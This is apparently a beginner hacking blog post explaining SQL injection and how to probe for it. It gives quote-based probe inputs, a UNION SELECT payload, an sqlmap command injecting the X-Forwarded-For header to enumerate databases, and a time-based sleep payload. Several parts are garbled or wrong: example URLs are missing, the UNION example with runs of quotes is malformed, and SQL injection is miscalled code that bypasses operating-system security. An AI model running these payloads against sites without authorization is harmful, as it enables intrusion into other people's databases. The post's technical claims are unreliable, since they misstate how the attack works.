How to Find SQL Injection Attack Vulnerabilities in 2022?
SQL Injection (also known as Structured Query Language injection) is one of the most popular and severe vulnerabilities out there.
It is one of the most widespread and dangerous vulnerabilities on the Internet.
It is a malicious code that can be used to bypass operating systems’ security features.
This functionality allows attackers maximum freedom in creating and manipulating the rest of the website’s structure and content, allowing them to gain complete control over it.
The bad thing about SQL Injection is that it’s difficult to detect and stop at the time of its exploitation.
The discovery of a SQL Injection vulnerability can be horrifying because it allows an attacker to directly access and potentially compromise the underlying data on your site.
In this article, I’ll show you what SQL injection is and how to locate it.
What is SQL injection?
This attack consists of the insertion or “injection” of a SQL query via the input data from the client to the application.
It allows an attacker to view data that they are not normally able to retrieve.
This might include data belonging to other users, or any other data that the application itself is able to access.
In many cases, attackers can modify or delete this data, causing persistent changes to the application’s content or behavior.
Basic SQL Statements
- Select Command — It is an introductory statement as it will be used while interacting with other commands. It is the basic statement in SQL.
- Where Command- It is the same as it sounds. It is also a basic statement in SQL. Example- SELECT name, age FROM Class_details WHERE age < 10 Now from this command, you will get the data from the columns’ name and age. But only those data will be retrieved whose age is less than 10 years.
- Order Command- It is used to sort the results in ascending or descending order. For ascending use ASC and for descending use DESC
How to test for SQL Injection
Example 1:
Let's take a query SELECT * FROM Table WHERE id=’1';
Here what the query wants to say is it wants to select all the data from the table from the id 1
So let's now understand what we want to do to test for SQL Injection.
if we use ‘ it will be false and if we use ‘’ it will be true
if we use “ it will be false and if we use “” it will be true
if we use \ it will be false and if we use \\ it will be true
I know you are a bit confused about true or false but you will get it now.
So as testing for a website we will be seeing only the id maybe or anything else you know about that so what we will use is
Let’s say the URL is like
and for that the query will be SELECT * FROM Table WHERE id=’1';
so we will test for that is
or
www.website.com?id=1"
or
so these will be like
SELECT * FROM Table WHERE id=’1'’;
SELECT * FROM Table WHERE id=’1'”;
SELECT * FROM Table WHERE id=’1'\;
And you know you have to complete the query to use another SQL statement
SELECT * FROM Table WHERE id=’1'’’;
or you can use is
SELECT * FROM Table WHERE id=’1'’’’’’’’’’’’UNION SELECT ‘2’;
it may return the data from id 2
For Example 2 Visit www.cyberhacks200.org
Some Tips for finding SQL injection
- Using SQL map
sqlmap -u “http://website.com" — header=”X-Forwarded-For: 1*” — dbs — batch — random-agent — threads=10 Injection marker: *
by injecting header - Time-based sqli
‘%2b(select*from(select(sleep(20)))a)%2b’
For more tips visit www.cyberhacks200.org
I hope you all like the blog if so comment down below and if you find any vuln please let me know I will be much happy to hear about that and if you want to see other blogs like this comment down.
For writing your own blog for cyberhacks200.org you can contact me.
We will meet on another blog
Till then
Take care and Happy Hacking
